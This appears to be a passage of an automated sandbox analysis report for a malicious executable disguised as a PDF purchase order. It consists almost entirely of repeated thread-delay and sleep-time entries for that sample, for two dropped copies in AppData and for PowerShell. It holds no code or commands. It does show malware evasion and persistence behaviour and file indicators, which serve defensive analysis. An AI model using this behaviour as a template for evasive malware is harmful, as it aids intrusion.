                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeThread delayed: delay time: 599078Jump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeThread delayed: delay time: 598963Jump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeThread delayed: delay time: 598844Jump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeThread delayed: delay time: 598733Jump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeThread delayed: delay time: 598625Jump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeThread delayed: delay time: 598462Jump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeThread delayed: delay time: 598344Jump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeThread delayed: delay time: 598234Jump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeThread delayed: delay time: 598124Jump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeThread delayed: delay time: 598013Jump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeThread delayed: delay time: 597890Jump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeThread delayed: delay time: 597781Jump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeThread delayed: delay time: 597672Jump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeThread delayed: delay time: 597562Jump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeThread delayed: delay time: 597453Jump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeThread delayed: delay time: 597343Jump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeThread delayed: delay time: 597234Jump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeThread delayed: delay time: 597125Jump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeThread delayed: delay time: 597012Jump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeThread delayed: delay time: 596890Jump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeThread delayed: delay time: 596781Jump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeThread delayed: delay time: 596672Jump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeThread delayed: delay time: 596562Jump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeThread delayed: delay time: 596453Jump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeThread delayed: delay time: 596273Jump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeThread delayed: delay time: 596156Jump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeThread delayed: delay time: 596042Jump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeThread delayed: delay time: 595890Jump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeThread delayed: delay time: 595679Jump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeThread delayed: delay time: 595534Jump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeThread delayed: delay time: 595418Jump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeThread delayed: delay time: 595294Jump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeThread delayed: delay time: 595152Jump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeThread delayed: delay time: 595031Jump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeThread delayed: delay time: 594922Jump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeThread delayed: delay time: 594812Jump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeThread delayed: delay time: 594703Jump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeThread delayed: delay time: 594593Jump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeThread delayed: delay time: 594484Jump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeThread delayed: delay time: 594375Jump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeThread delayed: delay time: 594265Jump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeThread delayed: delay time: 594156Jump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeThread delayed: delay time: 594046Jump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeThread delayed: delay time: 593936Jump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeThread delayed: delay time: 593812Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeThread delayed: delay time: 600000
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeThread delayed: delay time: 599890
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeThread delayed: delay time: 599781
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeThread delayed: delay time: 599671
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeThread delayed: delay time: 599561
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeThread delayed: delay time: 599449
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeThread delayed: delay time: 599343
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeThread delayed: delay time: 599234
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeThread delayed: delay time: 599125
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeThread delayed: delay time: 599015
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeThread delayed: delay time: 598906
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeThread delayed: delay time: 598797
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeThread delayed: delay time: 598687
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeThread delayed: delay time: 598576
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeThread delayed: delay time: 598469
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeThread delayed: delay time: 598318
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeThread delayed: delay time: 598134
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeThread delayed: delay time: 598002
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeThread delayed: delay time: 597890
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeThread delayed: delay time: 597775
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeThread delayed: delay time: 597672
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeThread delayed: delay time: 597168
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeThread delayed: delay time: 597062
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeThread delayed: delay time: 596952
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeThread delayed: delay time: 596843
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeThread delayed: delay time: 596734
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeThread delayed: delay time: 596595
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeThread delayed: delay time: 596469
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeThread delayed: delay time: 596344
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeThread delayed: delay time: 596234
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeThread delayed: delay time: 596122
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeThread delayed: delay time: 596015
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeThread delayed: delay time: 595906
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeThread delayed: delay time: 595797
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeThread delayed: delay time: 595687
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeThread delayed: delay time: 595568
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeThread delayed: delay time: 594729
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeThread delayed: delay time: 594625
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeThread delayed: delay time: 594511
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeThread delayed: delay time: 594406
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeThread delayed: delay time: 594297
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeThread delayed: delay time: 594187
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeThread delayed: delay time: 594073
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeThread delayed: delay time: 593953
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeThread delayed: delay time: 593843
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeThread delayed: delay time: 593734
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeThread delayed: delay time: 593625
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeThread delayed: delay time: 593515
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeThread delayed: delay time: 593402
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeThread delayed: delay time: 593297
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeThread delayed: delay time: 593187
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 600000
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599875
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599766
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599641
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599529
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599422
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599313
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599188
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599063
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598938
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598828
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598719
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598594
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598484
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598375
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598155
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598008
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597906
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597797
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597688
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597563
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597438
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597328
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597219
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597094
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596984
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596875
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596766
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596656
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596547
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596437
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596328
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596219
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596094
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595984
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595869
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595719
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595608
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595500
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595371
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595151
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 594985
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 594813
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 594656
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 594547
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 594437
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 594328
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 594200
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 594092
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 593982
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 593874
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 600000
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599891
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599766
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599641
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599516
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599406
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599297
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599188
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599063
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598938
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598828
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598719
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598594
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598485
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598360
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598235
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598110
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597985
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597860
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597735
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597610
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597485
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597360
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597235
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597110
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596985
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596860
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596735
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596610
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596485
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596360
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596235
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596110
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595985
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595860
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595675
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595562
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595453
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595339
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595235
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595110
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 594985
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 594860
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 594735
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 594610
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 594485
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 594360
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 594235
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 594110
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 593985
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3603Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4600Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 387Jump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeWindow / User API: threadDelayed 5638Jump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeWindow / User API: threadDelayed 4186Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeWindow / User API: threadDelayed 3490
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeWindow / User API: threadDelayed 6360
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeWindow / User API: threadDelayed 4235
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeWindow / User API: threadDelayed 5217
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeWindow / User API: threadDelayed 3595
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeWindow / User API: threadDelayed 6197
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exe TID: 7664Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8132Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8032Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7200Thread sleep time: -2767011611056431s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8160Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exe TID: 7056Thread sleep time: -32281802128991695s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exe TID: 7056Thread sleep time: -600000s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exe TID: 7056Thread sleep time: -599859s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exe TID: 7056Thread sleep time: -599743s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exe TID: 7056Thread sleep time: -599625s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exe TID: 7056Thread sleep time: -599515s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exe TID: 7056Thread sleep time: -599406s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exe TID: 7056Thread sleep time: -599297s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exe TID: 7056Thread sleep time: -599187s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exe TID: 7056Thread sleep time: -599078s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exe TID: 7056Thread sleep time: -598963s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exe TID: 7056Thread sleep time: -598844s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exe TID: 7056Thread sleep time: -598733s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exe TID: 7056Thread sleep time: -598625s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exe TID: 7056Thread sleep time: -598462s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exe TID: 7056Thread sleep time: -598344s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exe TID: 7056Thread sleep time: -598234s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exe TID: 7056Thread sleep time: -598124s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exe TID: 7056Thread sleep time: -598013s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exe TID: 7056Thread sleep time: -597890s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exe TID: 7056Thread sleep time: -597781s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exe TID: 7056Thread sleep time: -597672s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exe TID: 7056Thread sleep time: -597562s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exe TID: 7056Thread sleep time: -597453s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exe TID: 7056Thread sleep time: -597343s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exe TID: 7056Thread sleep time: -597234s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exe TID: 7056Thread sleep time: -597125s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exe TID: 7056Thread sleep time: -597012s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exe TID: 7056Thread sleep time: -596890s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exe TID: 7056Thread sleep time: -596781s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exe TID: 7056Thread sleep time: -596672s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exe TID: 7056Thread sleep time: -596562s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exe TID: 7056Thread sleep time: -596453s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exe TID: 7056Thread sleep time: -596273s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exe TID: 7056Thread sleep time: -596156s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exe TID: 7056Thread sleep time: -596042s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exe TID: 7056Thread sleep time: -595890s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exe TID: 7056Thread sleep time: -595679s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exe TID: 7056Thread sleep time: -595534s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exe TID: 7056Thread sleep time: -595418s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exe TID: 7056Thread sleep time: -595294s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exe TID: 7056Thread sleep time: -595152s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exe TID: 7056Thread sleep time: -595031s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exe TID: 7056Thread sleep time: -594922s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exe TID: 7056Thread sleep time: -594812s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exe TID: 7056Thread sleep time: -594703s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exe TID: 7056Thread sleep time: -594593s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exe TID: 7056Thread sleep time: -594484s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exe TID: 7056Thread sleep time: -594375s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exe TID: 7056Thread sleep time: -594265s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exe TID: 7056Thread sleep time: -594156s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exe TID: 7056Thread sleep time: -594046s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exe TID: 7056Thread sleep time: -593936s >= -30000sJump to behavior
